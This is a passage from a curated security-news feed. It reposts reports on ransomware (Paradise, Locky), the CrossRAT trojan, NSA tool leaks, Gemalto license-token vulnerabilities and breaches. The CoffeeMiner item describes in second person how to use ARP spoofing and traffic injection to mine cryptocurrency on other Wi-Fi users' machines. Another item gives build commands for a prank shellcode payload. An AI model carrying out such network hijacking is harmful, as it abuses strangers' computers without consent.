alquilan el servidor de control al mejor postor para que pueda llevar a cabo sus ataques informáticos. Por el momento no se sabe cómo logra entrar este ransomware en los sistemas, aunque lo más probable es que sea a través de correos electrónicos basura, aunque también se sospecha que sea a través de sesiones de escritorio remoto, tanto a través de RDP como de TeamViewer. Lo que sí se sabe es que, una vez infecta un equipo, se ejecuta a sí mismo con permisos de administrador y genera una clave única RSA-1024, utilizada para cifrar todos los datos del disco duro. Paradise cifra los datos de los usuarios y, aunque respeta su nombre, cambia la extensión por un conjunto de caracteres al azar, entre los cuales copia el correo a través del cual intentar recuperar los datos secuestrados. Por ejemplo, un fichero de prueba “test.jpg” se cifraría como “test.jpgid-3VwVCmhU.[info@decrypt.ws].paradise”. El malware también crea una nota de rescate en la que explica qué ha pasado y cómo debemos actuar si queremos tener alguna posibilidad de recuperar nuestros datos. Cómo protegernos del ransomware Paradise Debido al cifrado RSA, este ransomware tiene el inconveniente de que actúa muy lento y, además, utiliza muchos recursos. Por ello, si nos damos cuenta de la infección a tiempo, es posible detectarla y detenerla a tiempo (por ejemplo, apagando el ordenador), evitando que todos nuestros datos queden secuestrados por el ransomware, y no dando tiempo al ransomware a cifrar el fichero DecriptionInfo.auth que guarda la información de cifrado. Pese a ello, lo mejor es no caer víctimas de la amenaza y, para ello, las medidas de protección son las mismas que siempre, es decir, asegurarnos de tener nuestro Windows, y todas las aplicaciones instaladas en él, totalmente actualizadas. Además, también es recomendable utilizar un software antivirus actualizado y fiable, así como evitar descargar archivos potencialmente sospechosos desde Internet y desde el correo electrónico para evitar infectarnos a través de ellos. Por el momento, no hay forma de recuperar los datos secuestrados por este ransomware de forma gratuita, aunque los expertos de seguridad, como siempre, están intentando encontrar alguna debilidad en el ransomware y en el algoritmo que les permita crear una herramienta de descifrado para que las víctimas puedan recuperar sus datos. Fuente:https://www.redeszone.net/2017/09/16/funcionamiento-ransomware-paradise/ Noticias de seguridad informática http://noticiasseguridad.com/malware-virus/asi-funciona-el-peligroso-ransomware-paradise-que-usa-cifrado-rsa/
Via David Thomas
more...
No comment yet.
Rescooped by Juan Carlos Ruiloba from Cyber Security
Scoop.it!

Shadow Brokers anuncia nuevas filtraciones de malware de la NSA

Shadow Brokers anuncia nuevas filtraciones de malware de la NSA | Security | Scoop.it
SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/vulnerabilidades/shadow-brokers-anuncia-nuevas-filtraciones-de-malware-de-la-nsa/ TAGS: NSA, Shadow Brokers The Shadow Brokers, el grupo responsable de hackear a la Agencia de Seguridad Nacional estadounidense el año pasado, ha prometido filtrar el malware UNITEDRAKE de la NSA a sus suscriptores este mes de septiembre. A principios de junio, el grupo de hackers anunció la puesta en marcha de un servicio de suscripción, llamado Monthly Dump, en el que filtraría un nuevo lote de herramientas de hacking de la NSA a cambio de un pago de 100 Zcash, una criptomoneda prácticamente imposible de rastrear, que al cambio actual son unos 20.500 euros. En el mes de julio tuvo lugar la segunda entrega a un precio de 200 Zcash, y en agosto la tercera por 500 Zcash. Esta semana, The Shadow Brokers ha publicado una actualización en la que informa de algunos cambios en las condiciones del servicio Monthly Dump. En el post señalan, entre otras cuestiones, que los suscriptores recibirán cada mes dos descargas, y además han incluido un calendario con cada una de las entregas, que a partir del 15 de septiembre llegarán cada quince días y terminarán el 15 de noviembre. El montante total para tener acceso a las ocho entregas es de 16.000 Zcash, que al cambio actual son casi 3.300.000 euros. Las entregas correspondientes al mes de septiembre incluirían el manual de uso de UNITEDRAKE, un exploit de la NSA que salió a la luz en 2014 por las filtraciones de Edward Snowden que se utiliza junto con otros plugins y permite obtener el control total de los ordenadores infectados. Este malware es capaz de comprometer equipos con Windows XP, Windows Server 2003 y 2008, Windows Vista, Windows 7 SP1 y siguientes, Windows 8 y Windows Server 2012.  Tal como hemos aprendido tras el ataque masivo del ransomware Wannacry, el hecho de que las vulnerabilidades de los sistemas operativos caigan en malas manos es un peligro para la seguridad informática a nivel mundial. The Shadows Brokers fue el responsable de la filtración de EternalBlue, el exploit en el que se basa Wannacry, por lo que las nuevas fugas podrían dar lugar a nuevos ataques masivos en el futuro. Fuente:http://computerhoy.com/noticias/software/shadow-brokers-anuncia-nuevas-filtraciones-malware-nsa-67691 Noticias de seguridad informática http://noticiasseguridad.com/vulnerabilidades/shadow-brokers-anuncia-nuevas-filtraciones-de-malware-de-la-nsa/
Via David Thomas
more...
No comment yet.
Rescooped by Juan Carlos Ruiloba from Cyber Security
Scoop.it!

CrossRAT a Trojan built with Java that infects Windows, macOS, Linux and Solaris

CrossRAT a Trojan built with Java that infects Windows, macOS, Linux and Solaris | Security | Scoop.it
SOURCE: Information Security Newspaper http://www.securitynewspaper.com/2018/02/16/crossrat-trojan-built-java-infects-windows-macos-linux-solaris/ TAGS: Linux, macOS, Solaris, Windows Last week companies specialized in cyber security discovered the existence of a new Persistent Advanced Threat APT, supposedly sponsored by Dark Caracal, an organization dedicated to espionage. Since 2012, he has performed in 21 countries and has focused on mobile platforms, perhaps because of the large number of Android devices without support that are still in operation. Recently they have developed a cross-platform remote access RAT Trojan called CrossRAT. It is undetectable and can infect Windows, MacOS, Linux and Solaris. According to a information security expert, among the malicious actions that can be carried out are being able to access remotely to manipulate files of the system, take screenshots, put into operation arbitrary executables and have persistent access to the infected device. The cyber security researchers say that Dark Caracal does not rely on any zero-day vulnerability, but uses basic social engineering through Facebook groups and WhatsApp messages. CrossRAT is built with Java, so it is easy to decompile it and reverse engineer it. CrossRAT, implements a file called hmar6.jar to check the operating system used and finish the installation process correctly. Then it tries to gather information about the infected system, including the version, the architecture and the kernel compilation. On Linux systems that use systemd, it is dedicated to consulting the init files to determine the distribution. Most of the popular distributions like, Ubuntu, Fedora, openSUSE, RHEL 7, Arch Linux, Mageia and Manjaro, use systemd. CrossRAT implements specific mechanisms for each operating system that are executed one or more times to cause a reboot and register the infected computer to the command and control server of Dark Caracal, allowing the attackers to send commands and extract data, this shows that the malware was created for the purpose of surveillance. It connects to the flexberry.com domain through port 2223. According to information security professionals its surprising that it has no predefined order to activate the keylogger, because the feature cannot be activated, from the command and control server, something that can be justified in that it is still at an early stage of development.
Information Security Newspaper http://www.securitynewspaper.com/2018/02/16/crossrat-trojan-built-java-infects-windows-macos-linux-solaris/
Via David Thomas
more...
No comment yet.
Rescooped by Juan Carlos Ruiloba from Cyber Security
Scoop.it!

A silver bullet for the attacker

A silver bullet for the attacker | Security | Scoop.it
SOURCE: Information Security Newspaper http://www.securitynewspaper.com/2018/01/25/silver-bullet-attacker/ TAGS: HTTP protocol, silver bullet

A study into the security of hardware license tokens. In the past years, the problem of vulnerabilities in industrial automation systems has been becoming increasingly important. The fact that industrial control systems have been developing in parallel with IT systems, relatively independently and often without regard for modern secure coding practices is probably the main source of ICS security problems. As a result of this, numerous custom solutions have appeared, including proprietary network protocols and algorithms for authentication and encryption. It is these solutions that were the main source of threats discovered by ICS IT security researchers. At the same time, we can see that industrial automation systems derive some of their problems from common technologies (examples include CodeSys Runtime, Microsoft Windows vulnerabilities, etc.).

Companies attach different priority levels to such problems and the risks associated with them. It is obvious for everybody that vulnerability information should never be disclosed until a patch is released. However, many companies believe that this information should not be published even when a patch is available. For software developers, this is always a blow to their reputation. And companies that use vulnerable systems are not always physically able to install a patch or this installation may involve significant costs (interrupted operation of the systems to be updated, the cost of work related to installing updates, etc.). We assess risks based on our experience of a security system developer and supplier. We are convinced that it is absolutely essential to inform users of vulnerable software about the new threat and the need to update their software as soon as possible. This certainly does not guarantee that all users of vulnerable systems will promptly update them and the threat will go away. However, in our experience, if this is not done very few users update their systems in a timely manner, even if patches are available. We confront hundreds of thousands of new threats every day and we can see that threat actors are on a constant lookout for new attack opportunities. And we realize that by keeping silent about problems we give those threat actors a chance. This is why we decided to share information on one of our discoveries: according to our research, connecting a software license management token to a computer may open a hidden remote access channel for an attacker. Why we decided to analyze SafeNet Sentinel While performing various penetration tests, Kaspersky Lab ICS CERT experts repeatedly encountered the same service on the computers of customers who used software and hardware solutions by different industrial vendors. The experts didn’t attach much importance to it until it was found to be vulnerable. The service was hasplms.exe, which is part of the SafeNet Sentinel hardware-based solution by Gemalto. The solution provides license control for software used by customers and is widely used in ICS and IT systems. The solution’s software part consists of a driver, a web application and a set of other software components. The hardware part is a USB token. The token needs to be connected to a PC or server on which a software license is required. Some of the USB token models are listed in the table below. License control solutions of this type are based on the following operating principles: a software product requires a license to operate properly; when a USB token is plugged into the computer, the software “sees” the license and becomes fully functional. The token must be plugged in every time the software is started and remain connected while it is in use. The software part of the Gemalto solution is installed once and remains functional regardless of the life cycle of the software requiring a token. This Gemalto solution is used in products by other software vendors, including such companies as ABB, General Electric, HP, Cadac Group, Zemax and many other organizations, the number of which, according to some estimates, reaches 40 thousand. According to the results of independent research conducted by Frost and Sullivan in 2011, SafeNet Sentinel, which is currently owned by Gemalto, has a 40% market share for license control solutions in North America and over 60% in Europe. The number of end users who use Gemalto solutions is not known. However, if each company has 100 clients, the number of users is in the millions. Unfortunately, few people realize that connecting a token to a computer to control licenses may not be a safe thing to do. Vulnerabilities and attack vectors From researchers’ viewpoint, hasplms.exe exhibited a rather curious behavior in the system: it could be remotely accessed and communicated with on open port 1947. The protocol type was defined by the network packet header – either HTTP or a proprietary binary protocol was used. The service also had an API of its own, which was based on the HTTP protocol. Analyzing the service was made more difficult by the fact that the binary file used a VMProtect-type protector and generated its bytecode from the original Gemalto code. Due to this, it was decided to use fuzzing as the main tool for analyzing the vulnerable service’s behavior. First of all, we looked at the localization function – the user could download language packs consisting of two files, one of which was localize.xml. The second file, in HTML format, had parameters, one of which turned out to be vulnerable to buffer overflow. It would have been a simple vulnerability, if it wasn’t for one curious detail: although, as mentioned above, a protector was used, for some reason the developers did not use any of the classical mechanisms providing protection from such binary vulnerabilities (such as Stack Canary, Stack Cookie, ASLR, etc.). As a result, a simple buffer overflow could allow an attacker to execute arbitrary code on the remote system. Note that such software development flaws are very rare in modern solutions. As a rule, secure coding practices are implemented when developing serious commercial products (such as SDL – security development lifecycle), which means that security is designed into applications at the development stage, rather than being implemented as an additional option. This attack vector can be used without LPE (local privilege escalation) – the vulnerable process runs with SYSTEM privileges, enabling malicious code to run with the highest privileges.

Sample script loading a language pack file

Result of Buffer Overflow exploitation, leading to RCE

The vulnerability was assigned the number CVE-2017-11496. This was just one of the vulnerabilities we found. And the overall result of our research was disquieting. In late 2016 – early 2017, 11 vulnerabilities were identified: two allowed remote code execution if exploited and nine were denial-of-service vulnerabilities. By June 2017, Kaspersky Lab ICS CERT had identified three more vulnerabilities: an XML bomb and two denial-of-service flaws, one of which could potentially lead to remote execution of arbitrary code. In total, 14 vulnerabilities have been identified, all quite dangerous (for example, exploitation of each of the Remote Execution of Arbitrary Code type vulnerabilities is automatically performed with SYSTEM privileges, i.e., the highest privilege level in Windows). All attack vectors affecting the vulnerable service were multi-stage. We promptly sent all information on the vulnerabilities identified to Gemalto. The vulnerabilities were assigned the following respective CVE numbers: CVE-2017-11496 – Remote Code Execution CVE-2017-11497 – Remote Code Execution CVE-2017-11498 – Denial of Service CVE-2017-12818 – Denial of Service CVE-2017-12819 – NTLM hash capturing CVE-2017-12820 – Denial of Service CVE-2017-12821 – Remote Code Execution CVE-2017- 12822 – Remote manipulations with configuration files In addition to vulnerability descriptions, we sent a description of peculiar functionality to Gemalto. Peculiar functionality Kaspersky Lab ICS CERT experts have found that hasplms.exe has some rather unusual functionality: When a Gemalto USB token is first connected to a computer (even if the active session is blocked), a driver and service that accepts network connections on port 1947 are installed if the Internet access is available. If a driver is manually downloaded from the Gemalto website and installed, a driver and service that accept network connections on port 1947 are installed and port 1947 is added to Windows firewall exceptions. If Gemalto software is installed as part of a third-party installation file, port 1947 is also added to Windows firewall exceptions. There is an API function which enables or disables the administrative panel in the web interface, making it possible to modify the settings of the program part of the SafeNet Sentinel hardware-based solution. The panel is available by default on the localhost IP address – 127.0.0.1. The API can be used to change the internal proxy settings for updating language packs. After changing the proxy server, the service’s internal logic can be used to obtain the NTLM hash of the user account under which the hasplms.exe process is running (i.e., SYSTEM). This appears to be an undocumented feature and can be used for stealthy remote access. This means that remote attackers can use these capabilities to gain access to the administrative panel of the Gemalto software, carry out attacks with system user privileges and conceal their presence after completing these attacks. As mentioned above, Gemalto representatives were informed of this attack vector. Non-transparent security Solutions, technologies or individual software modules used by many third-party vendors often do not undergo proper security testing. This potentially opens up new attack vectors. At the same time, closing vulnerabilities in such products, which are often used, among other applications, in banking and industrial control systems, is not always a smooth process: for some reason, vendors of such systems are in no hurry to notify their users of problems identified in their products. In early 2017, we sent information about 11 vulnerabilities we had identified to Gemalto. It was only in late June that, in response to our repeated requests, the vendor informed us that a patch had been released and information about the vulnerabilities that had been closed, as well as a new version of the driver, could be found on the company’s internal user portal. On June 26, we informed Gemalto of the suspicious functionality and of three more vulnerabilities. This time, things went quicker: on July 21 the vendor released a private notice on a new driver version – without any mention of the vulnerabilities closed. According to Gemalto, the company has notified all of its customers of the need to update the driver via their account dashboards. However, this was apparently not sufficient: after we published information about the vulnerabilities identified, we were contacted by several developers of software which uses hasplms. It became clear from our communication with them that they were not aware of the problem and continued to use versions of the product with multiple vulnerabilities. Update software to the current version (7.6) ASAP We urge those users and companies that use Gemalto’s SafeNet Sentinel to install the latest (secure) version of the driver as soon as possible or contact Gemalto for instructions on updating the driver. We also recommend closing port 1947, at least on the external firewall (on the network perimeter) – but only as long as this does not interfere with business processes. In the case of installing the driver via Microsoft Windows Update servers, we recommend checking hasplms.exe to make sure it is the latest version. If an obsolete version is used, it is crucial to install the latest (secure) version of the driver from the vendor’s website or contact Gemalto for instructions on updating the driver. We also recommend closing port 1947, at least on the external firewall (on the network perimeter) – but only as long as this does not interfere with business processes. This will help to reduce the risk of the vulnerabilities being exploited. Some software vendors who use third-party solutions as part of their products may be very thorough about the security of their own code, while leaving the security of third-party solutions to other companies (the vendors of these solutions). We very much hope that most companies act responsibly both with respect to their own solutions and with respect to third-party solutions used in their products. Source:https://securelist.com/a-silver-bullet-for-the-attacker/83661/
Information Security Newspaper http://www.securitynewspaper.com/2018/01/25/silver-bullet-attacker/
Via David Thomas
more...
No comment yet.
Rescooped by Juan Carlos Ruiloba from Cyber Security
Scoop.it!

OnePlus confirms hack exposed credit cards of phone buyers

OnePlus confirms hack exposed credit cards of phone buyers | Security | Scoop.it
SOURCE: Information Security Newspaper http://www.securitynewspaper.com/2018/01/20/oneplus-confirms-hack-exposed-credit-cards-phone-buyers/ TAGS: credit cards, hack exposed, OnePlus

The company put a hold on payments through its site after fraud reports emerged.

OnePlus has confirmed that its systems have been breached, following reports of credit card fraud from customers who bought a phone from the company. The phone maker sent an email to customers Friday, saying customers' credit card numbers, expiry dates, and security codes "may have been compromised." The email, posted by Peter Smallbone on Twitter, said: "As soon as we were made aware of the attack, we launched an urgent investigation. We suspended credit card payments and have been working with a cybersecurity firm to reinforce our systems." Several customers also posted the same email on the company's forums on Friday. The company is "looking" to provide credit card monitoring for customers affected. A malicious script was inserted on the company's pages, capturing and sending data directly from the user's browser. The script, now removed, is said to have "operated intermittently." The company said customers who entered their credit card details on the company's site between mid-November and January 11 may be affected. The company said that may include "up to 40,000" customers. Anyone who paid with PayPal aren't affected, neither are those who paid with a previously saved credit card on file. A OnePlus spokesperson did not comment beyond the company's statement. Reports of credit card fraud started popping up over the weekend. On Thursday, the company said it was looking into a "serious issue" and "as a precaution, we are temporarily disabling credit card payments" on its site. Source:http://www.zdnet.com/article/oneplus-confirms-hack-exposed-credit-cards-of-phone-buyers/
Information Security Newspaper http://www.securitynewspaper.com/2018/01/20/oneplus-confirms-hack-exposed-credit-cards-phone-buyers/
Via David Thomas
more...
No comment yet.
Rescooped by Juan Carlos Ruiloba from Cyber Security
Scoop.it!

CoffeeMiner: Un script que automatiza la inyección de código para minar criptomoneda en redes Wi-Fi

CoffeeMiner: Un script que automatiza la inyección de código para minar criptomoneda en redes Wi-Fi | Security | Scoop.it
SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/seguridad-informatica/coffeeminer-un-script-que-automatiza-la-inyeccion-de-codigo-para-minar-criptomoneda-en-redes-wi-fi/ TAGS: CoffeeMiner, red Wi-Fi En muchas ocasiones os hemos explicado los riesgos que tienen las redes inalámbricas Wi-Fi públicas al conectarnos. En la mayoría de ocasiones corremos el riesgo de que un atacante pueda robarnos información, incluyendo contraseñas, e incluso podrían hacerse con el control de nuestro equipo. Hoy tenemos un riesgo más a añadir a la lista: pueden inyectar código de CoinHive para usar nuestro equipo que está conectado a una red Wi-Fi para minar criptomoneda, y todo ello lo podremos hacer gracias a CoffeeMiner. Hace unas semanas salió la noticia que en un StarBucks había unos ciberdelincuentes que utilizaban los portátiles conectados a la red Wi-Fi para minar criptomoneda, hoy ya tenemos una herramienta que automatiza todo el proceso: se encargará de hacer el ataque Man In The Middle, crear un proxy para editar el tráfico HTTP al vuelo e inyectar el código de CoinHive para minar criptomoneda, y por supuesto, poner en marcha el servidor web en nuestro equipo para que el código Javascript funcione correctamente. Lógicamente, la herramienta CoffeeMiner no se encarga de crackear la red Wi-Fi, porque normalmente este tipo de redes están abiertas a cualquiera, de ahí el riesgo de conectarte. CoffeeMiner: Así puedes hacer que todos los usuarios de la red Wi-Fi mine criptomoneda para ti El escenario típico de uso de esta herramienta es una red Wi-Fi abierta donde nos hemos conectado con nuestro ordenador. Aprovechando la gran afluencia de usuarios haciendo uso de dicha red Wi-Fi, podemos realizar un ataque MITM para modificar las peticiones HTTP que realicen en la web.   El script CoffeeMiner va a automatizar la realización del ataque ARPSpoofing, de esta manera, engañaremos a los diferentes usuarios y les haremos creer que nosotros somos el gateway, para que toda la información pase antes por nosotros para modificarla. Lo mismo ocurrirá con el gateway real, le engañaremos para que crea que nosotros somos la víctima. En RedesZone ya os hemos enseñado este tipo de técnicas, no es algo nuevo, y la herramienta por excelencia para sistemas Linux es arpspoof que viene por ejemplo en Kali Linux. El segundo software que CoffeeMiner va a utilizar es mitmproxy, una herramienta que nos permitirá analizar el tráfico que pasa a través de nosotros, y editarlo. Esto último es lo más importante, ya que deberemos modificar el código HTML de las webs visitadas al vuelo, de tal forma que inyectemos el código de CoinHive para minar criptomoneda. Por último, necesitaremos tener activado un servidor HTTP para llamar a nuestro código Javascript que se encargará de minar criptomoneda, CoffeeMiner lo hará utilizando la librería “http.server”, de esta forma, tendremos un servidor HTTP muy simple sin consumir excesivos recursos de nuestro sistema. Debemos recordar que deberemos darnos de alta en CoinHive para poder minar criptomoneda, el script CoffeeMiner inyectará el código en cada página HTML que la víctima visite, de esta manera, minaremos lo máximo posible. En el siguiente vídeo podéis ver una demostración del funcionamiento de esta herramienta en un laboratorio virtual usando VirtualBox: [embed]https://youtu.be/wmYJ6Z4LoCA[/embed] Y a aquí en una red Wi-Fi real, con los portátiles conectados a la red y minando criptomoneda: [embed]https://youtu.be/-TnzGLUD0DU[/embed] Os recomendamos visitar la página web oficial del autor de CoffeeMiner, y también el GitHub de CoffeeMiner donde encontraréis el código fuente e instrucciones para modificarlo y ejecutarlo. Ya tenemos un motivo más para no conectarnos nunca a redes Wi-Fi abiertas, ya que podrían utilizar nuestro PC para minar criptomoneda. Fuente:https://www.redeszone.net/2018/01/06/coffeeminer-un-script-que-automatiza-la-inyeccion-de-codigo-para-minar-criptomoneda-en-redes-wi-fi/ Noticias de seguridad informática http://noticiasseguridad.com/seguridad-informatica/coffeeminer-un-script-que-automatiza-la-inyeccion-de-codigo-para-minar-criptomoneda-en-redes-wi-fi/
Via David Thomas
more...
No comment yet.
Rescooped by Juan Carlos Ruiloba from Cyber Security & Digital Forensics
Scoop.it!

sharkPy - NSA Tool to Dissect, Analyze, and Interact with Network Packet Data using Wireshark and libpcap capabilities

sharkPy - NSA Tool to Dissect, Analyze, and Interact with Network Packet Data using Wireshark and libpcap capabilities | Security | Scoop.it
Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security ☣

Via Constantin Ionel Milos / Milos Constantin
more...
No comment yet.
Rescooped by Juan Carlos Ruiloba from Cyber Security & Digital Forensics
Scoop.it!

Attackers Deploy New ICS Attack Framework “TRITON” and Cause Operational Disruption to Critical Infrastructure « Attackers Deploy New ICS Attack Framework “TRITON” and Cause Operational Disruption ...

Attackers Deploy New ICS Attack Framework “TRITON” and Cause Operational Disruption to Critical Infrastructure « Attackers Deploy New ICS Attack Framework “TRITON” and Cause Operational Disruption ... | Security | Scoop.it
Mandiant recently responded to an incident at a critical infrastructure organization where an attacker deployed malware designed to manipulate industrial safety systems.

Via Constantin Ionel Milos / Milos Constantin
more...
No comment yet.
Rescooped by Juan Carlos Ruiloba from Cyber Security
Scoop.it!

Nuevo Ransomware/shellcode que recrea la escena de Jurassic Park en la que se hackea el servidor.

Nuevo Ransomware/shellcode que recrea la escena de Jurassic Park en la que se hackea el servidor. | Security | Scoop.it
SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/importantes/nuevo-ransomware-shellcode-que-recrea-la-escena-de-jurassic-park-en-la-que-se-hackea-el-servidor/ TAGS: HACKEA EL SERVIDOR, ransomware ¿Porqué pop calc cuando puedes utilizar pop Nedry? Esta herramienta contiene un x86-64 payload que recrea la  escena de Jurassic Park en la que Dennis Nedry encierra a Ray Arnold fuera de su terminal, explica  Jim Gil, un experto de seguridad informática del International Institute of Cyber Security (IICS) acerca de pop Nedry. Cuando se ejecuta pasa lo siguiente: Asigna una ventana en la consola con llamada a AllocConsole Sale un aviso que dice “¡No has dicho la palabra mágica!” repetitivamente con llamadas a WriteConsoleA Al mismo tiempo baja winmm.dll y obtiene la dirección del procedimiento para PlaySound Baja el audio “¡No, no, no...no has dicho la palabra mágica!” de la memoria utilizando PlaySound Baja shell32.dll y obtiene la dirección del proceso para ShellExecuteA Abre el buscador del objetivo en una página web que tiene en infame Nedry GIF utilizando ShellExecuteA Entra en modo reposo durante un tiempo para que el audio se reproduzca Restaura el stack’s y los ret’s Construcción Se utiliza Python script (Windows)   El Python Script se realizó para Windows. Para activarlo asegúrese de que tanto nasm y Python 2 estén instalados y añadidos en la variable PATHenvironment. Inicie el siguiente comando desde el directorio de project’s parent para generar la posición independiente del código binario:   > python build.py --outfile nedry.bin --url http://127.0.0.1:8080/nedry.html   Ésto reunirá lo armado, soltará el binary in .\build, y escribe en la página URL de Nedry Construcción manual (Cualquier sistema operativo) También puedes construir el shellcode manualmente para cualquier sistema operativo con nasm > cd .\src > nasm -f bin -o pop-nedry.bin pop-nedry.asm Una vez que hayas construido el binary, necesitas un patch en tu URL. Para hacer esto, abre un editor hex y busca 0x1dd. Re-escribe los NULL bytes con tu URL. Asegúrate que comience con http:// o https://. No utilices una URL de más de 63 caracteres para asegurar que quede al menos un NULL para terminar el string. Uso de prueba Construir el shellcode binary > python build.py --outfile nedry.bin --url http://127.0.0.1:8080/nedry.html Inicie un servidor web de Python para instalar la página HTML Nedry > cd .\html > python -m SimpleHTTPServer 8080 Pruebe el shellcode con ShellcodeTester.exe incluido (o su explorador favorito). > cd .\utils > ShellcodeTester.exe ..\build\nedry.bin Fuente: https://github.com/zznop/pop-nedry Noticias de seguridad informática http://noticiasseguridad.com/importantes/nuevo-ransomware-shellcode-que-recrea-la-escena-de-jurassic-park-en-la-que-se-hackea-el-servidor/
Via David Thomas
more...
No comment yet.
Rescooped by Juan Carlos Ruiloba from Cyber Security
Scoop.it!

Plataformas de intercambio de Bitcoin en problemas

Plataformas de intercambio de Bitcoin en problemas | Security | Scoop.it
SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/hacking-incidentes/plataformas-de-intercambio-de-bitcoin-en-problemas/ TAGS: ataque de DDoS, Bitcoin

Según reportes de Reuters, el mercado de divisas digitales NiceHash afirma haber sufrido el robo de 4.700 bitcoin, el equivalente a casi 64 millones de dólares. Andrej P. Škraba, jefe de marketing de NiceHash, afirmó que el ataque fue “altamente profesional con Ingeniería Social sofisticada” y que la compañía se encuentra colaborando con las autoridades locales de Eslovenia para intentar resolver el caso.

Además, la plataforma cesó sus actividades durante 24 horas para investigar la brecha de seguridad y como medida preventiva le recomendó a sus usuarios que cambien sus contraseñasmientras intentan resolver el caso y obtener más información sobre lo que pudo haber sucedido.

Bitfinex: otra plataforma en problemas

Bitfinex, la plataforma de intercambio de divisas digitales, ha estado en aprietos ultimamente ya que el lunes sufrió un ataque de denegación de servicio que le obligó a permanecer offline. Este ataque trajo reminiscencias de un incidente similar ocurrido días anteriores.

Luego de tweetear que “La plataforma actualmente tiene una carga pesada y estamos trabajando para que vuelva a estar online“, la plataforma de intercambio basada en Honk Kong luego confirmó la verdadera naturaleza del ciberataque.

Las operaciones se normalizaron luego de una hora y este incidente fue precedido por otro ataque de DDoS ocurrido el 26 de noviembre que “comenzó durante un mantenimiento temprano y ha continuado desde entonces“, de acuerdo a un tweet publicado por Bitfinex ese mismo día.

Todavía no queda claro quienes están detrás de los ataques ni sus motivos. De todos modos, estos incidentes aparecieron justo en el momento en el que el precio del bitcoin llegaba a un nuevo pico, y quizás motivando a los cibercriminales a poder manipular y aprovecharse del precio.

En el medio de estos dos ataques también ocurrió un “flash crash” (movimientos bruscos en la cotización) durante el último miércoles y que condujo a varios usuarios a reportar severas pérdidasluego de que los precios de las criptodivisas NEO, OMG y ETP se desplomaran hasta un 90%, causando la clausura de sus posiciones. Por su parte, Bitfinex argumentó que estaba operando normalmente. Fuente:https://www.welivesecurity.com/la-es/2017/12/07/plataformas-intercambio-bitcoin-problemas/ Noticias de seguridad informática http://noticiasseguridad.com/hacking-incidentes/plataformas-de-intercambio-de-bitcoin-en-problemas/
Via David Thomas
more...
No comment yet.
Rescooped by Juan Carlos Ruiloba from Cyber Security
Scoop.it!

Russian Authorities Announce Takedown of RAMP Dark Web Marketplace

Russian Authorities Announce Takedown of RAMP Dark Web Marketplace | Security | Scoop.it
SOURCE: Information Security Newspaper http://www.securitynewspaper.com/2017/09/19/russian-authorities-announce-takedown-ramp-dark-web-marketplace/ TAGS: Dark Web Russian police acknowledged today that they were responsible for taking down RAMP [Russian Anonymous Marketplace] — a Tor-based market that primarily sold drugs — a Russian Interior Ministry official told Russian news agency TASS today. The takedown took place in July, but Russian authorities never made their action public, continuing to investigate suspected criminals. The news surfaced this morning when Deputy Interior Minister Mikhail Vanichkin made public a letter he sent to Anton Gorelkin, a State Duma member, who previously asked the Ministry about the measures they took to combat online criminality. RAMP was one of the most popular Dark Web marketplaces RAMP was an online website available through the Tor network that allowed users to buy or advertise all sorts of illegal products. The site — founded circa 2012 and available only in Russian — had a reputation for being the go-to place for buying drugs that could be delivered within Russia's territory. The platform didn't look like a regular marketplace, but more like a forum, with approved vendors having their personal forum section where they could advertise products. Bleeping Computer noticed the website going down in early July, just about the same time US authorities had taken down AlphaBay, and Europol and Dutch police announced they had taken down Hansa Market, two other Dark Web marketplaces, also used for selling drugs, weapons, and other illegal products. RAMP clone popped up after a few days, but died out At the time, many users believed the website was having hosting issues and might have been under a DDoS attack. About a week later, on July 21, Bleeping Computer noticed a new website appear on the Dark Web, calling itself RAMP 2.0, claiming to be a new version of the older portal. The site featured an almost identical interface.
 
The website remained active for a few more weeks but eventually went down as well. Currently, the Dark Web is riddled with fake RAMP websites that try to scam users into paying some sort of access tax before being allowed on the supposed site.
In the weeks following RAMP's closure, this reporter also noticed a surge in individual shops selling drugs to Russian-speaking users. RAMP's sudden closure most likely drove the rise in new Russian shops for illegal products on the Dark Web. In addition, a new service called RuTor was heavily advertised as a RAMP alternative, using ads on underground hacking forums, XMPP spam, and ads on other Dark Web portals. At the time of writing, RuTor is still up and running.
According to Deep Dot Web, a directory that tracks Dark Web marketplaces, RAMP was ranked second behind AlphaBay as one of the most popular Dark Web marketplaces on Deep Dot Web portal. Currently, authorities have taken down #1, #2, and #4 from Deep Dot Web's July ranking. According to a recent report, Dream Market — #3 on the list — ain't doing much better either, and users fear that site operators pulled an exit scam, going off into the sunset with the cryptocurrency stored in escrow accounts. Source:https://www.bleepingcomputer.com/news/security/russian-authorities-announce-takedown-of-ramp-dark-web-marketplace/ Information Security Newspaper http://www.securitynewspaper.com/2017/09/19/russian-authorities-announce-takedown-ramp-dark-web-marketplace/
Via David Thomas
more...
No comment yet.
Rescooped by Juan Carlos Ruiloba from Cyber Security
Scoop.it!

Así es la última variante de Locky Ransomware que nos tiene en jaque

Así es la última variante de Locky Ransomware que nos tiene en jaque | Security | Scoop.it
SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/malware-virus/asi-es-la-ultima-variante-de-locky-ransomware-que-nos-tiene-en-jaque/ TAGS: Locky Ransomware Una nueva variante de Locky Ransomware ha sido descubierta recientemente por el analista de malware Stormshield coldshell. Esta variante cambia a la extensión .ykcol para cifrar los archivos. Por ello, si un usuario está infectado con este ransomware, no se trata del ransomware Ykcol. Se trata por tanto de Locky, pero con otra extensión diferente. Ha sido sin duda uno de los malware más famosos de los últimos tiempos en todo el mundo. .Ykcol, la última variante de Locky Esta variante se distribuye actualmente a través de correos electrónicos de spam que tienen una línea de asunto de Estado de factura. Contiene un archivo adjunto 7zip o 7z. Este archivo adjunto contiene un archivo VBS que, cuando se ejecuta, descargará el ejecutable de Locky de un sitio remoto y lo ejecutará. Es extraño que estén usando un accesorio 7z si tenemos en cuenta que muchos destinatarios pueden no tener el software necesario para abrirlo. Esto probablemente se está haciendo para evitar los filtros más estrictos puestos recientemente por Gmail y otros servicios de correo electrónico. Una vez que el archivo se descarga y ejecuta, se escaneará el equipo para buscar los archivos y cifrarlos. Cuando esta variante de Locky cifra un archivo, modificará el nombre del mismo y luego agregará el .ykcol. Al cambiar el nombre del archivo, utiliza el formato [first_8_hexadecimal_chars_of_id] – [next_4_hexadecimal_chars_of_id] – [next_4_hexadecimal_chars_of_id] – [4_hexadecimal_chars] – [12_hexadecimal_chars] 